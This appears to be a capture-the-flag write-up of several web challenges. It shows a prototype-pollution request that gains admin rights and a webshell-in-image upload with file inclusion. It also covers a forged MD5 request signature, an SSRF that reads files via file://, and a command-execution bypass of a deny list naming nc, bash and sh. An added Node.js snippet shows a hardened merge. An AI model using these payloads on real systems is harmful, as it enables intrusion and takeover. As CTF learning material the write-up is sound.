多重宇宙日记 (Multiverse Diary)

Pollute the isAdmin property to true directly and the admin panel becomes visible.
Payload:

POST /api/profile/update HTTP/1.1
Host: node6.anna.nssctf.cn:21396
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://node6.anna.nssctf.cn:21396/api/profile
Content-Type: application/json
Content-Length: 81
Origin: http://node6.anna.nssctf.cn:21396
Connection: close
Cookie: connect.sid=s%3ACtewAuMzvsQlrpFde6TSCJip6jv0fCtY.STGeEXBPKbSz0qqpBD0pOEZCaY5PcqCCw4BYUwHzjBY
Priority: u=0

{
"settings":{
"theme":"1",
"language":"1",
"__proto__":{
"isAdmin":true
}
}
}
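As an added example (not part of the original write-up or the challenge's code), the Node.js snippet below shows why the payload above works and how the endpoint should have handled it: a naive recursive merge of the submitted settings walks into the `__proto__` key and writes isAdmin onto Object.prototype, while a merge that skips prototype-related keys leaves it untouched. The merge functions and the profile object are assumptions; the server's real code is not on the page.

```javascript
// Added example, not the challenge's code; the merge functions are assumptions
// about how a settings endpoint might apply a JSON body. The body below is
// constructed with the same shape as the payload in the write-up.
const body = JSON.parse(
  '{"settings":{"theme":"1","language":"1","__proto__":{"isAdmin":true}}}'
);

// Naive deep merge: recurses into every own key, "__proto__" included.
// target["__proto__"] resolves to Object.prototype, so {"isAdmin":true}
// lands on the prototype shared by every plain object in the process.
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    const val = source[key];
    if (val && typeof val === 'object' && !Array.isArray(val)) {
      if (!target[key] || typeof target[key] !== 'object') target[key] = {};
      naiveMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}
// Hardened merge: skips prototype-related keys and only descends into keys
// the target owns itself (an allow-list of known settings is stronger still).
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const val = source[key];
    if (val && typeof val === 'object' && !Array.isArray(val)) {
      if (!Object.hasOwn(target, key) || typeof target[key] !== 'object') target[key] = {};
      safeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}
// Apply the payload with each merge and report whether an unrelated, freshly
// created object gained isAdmin; demoNaive undoes the pollution afterwards.
function demoNaive() {
  naiveMerge({ settings: { theme: '0', language: '0' } }, body);
  const polluted = ({}).isAdmin === true;
  delete Object.prototype.isAdmin;
  return polluted; // true
}
function demoSafe() {
  const profile = { settings: { theme: '0', language: '0' } };
  safeMerge(profile, body);
  return { polluted: ({}).isAdmin === true, theme: profile.settings.theme };
}
console.log(demoNaive(), demoSafe()); // true { polluted: false, theme: '1' }
```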

easy_file

Only jpg files can be uploaded.
Upload an image carrying a PHP webshell first, then include it through the file parameter in admin.php.

easy_signin

Requests are verified with an X-sign signature; generate the signature yourself from the front-end JavaScript code:

const shortMd5User = '21232f';
const shortMd5Pass = '019202';
const timestamp = '1748258425996';
const secretKey = 'easy_signin';
const sign = CryptoJS.MD5(shortMd5User + shortMd5Pass + timestamp + secretKey).toString();
console.log(sign);

On the dashboard, a hint points to /var/www/html/backup/8e0132966053d4bf8b2dbe4ede25502b.php.
The homepage source references api.js, which reveals the route /api/sys/urlcode.php?url=
So the source can be retrieved through /api/sys/urlcode.php?url=file:///var/www/html/backup/8e0132966053d4bf8b2dbe4ede25502b.php

<?php
if ($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
    highlight_file(__FILE__);

    $name = "waf";
    $name = $_GET['name'];

    if (preg_match('/\b(nc|bash|sh)\b/i', $name)) {
        echo "waf!!";
        exit;
    }

    if (preg_match('/more|less|head|sort/', $name)) {
        echo "waf";
        exit;
    }

    if (preg_match('/tail|sed|cut|awk|strings|od|ping/', $name)) {
        echo "waf!";
        exit;
    }

    exec($name, $output, $return_var);
    echo "执行结果:\n";
    print_r($output);
    echo "\n返回码:$return_var";
} else {
    echo("非本地用户");
}
?>

Note that the request must come from localhost, so the /api/sys/urlcode.php?url= endpoint can be used for SSRF:

/api/sys/urlcode.php?url=http://127.0.0.1/backup/8e0132966053d4bf8b2dbe4ede25502b.php?name=ls${IFS}../

This reveals 327a6c4304ad5938eaf0efb6cc3e53dc.php; visiting it gives the flag.

君の名は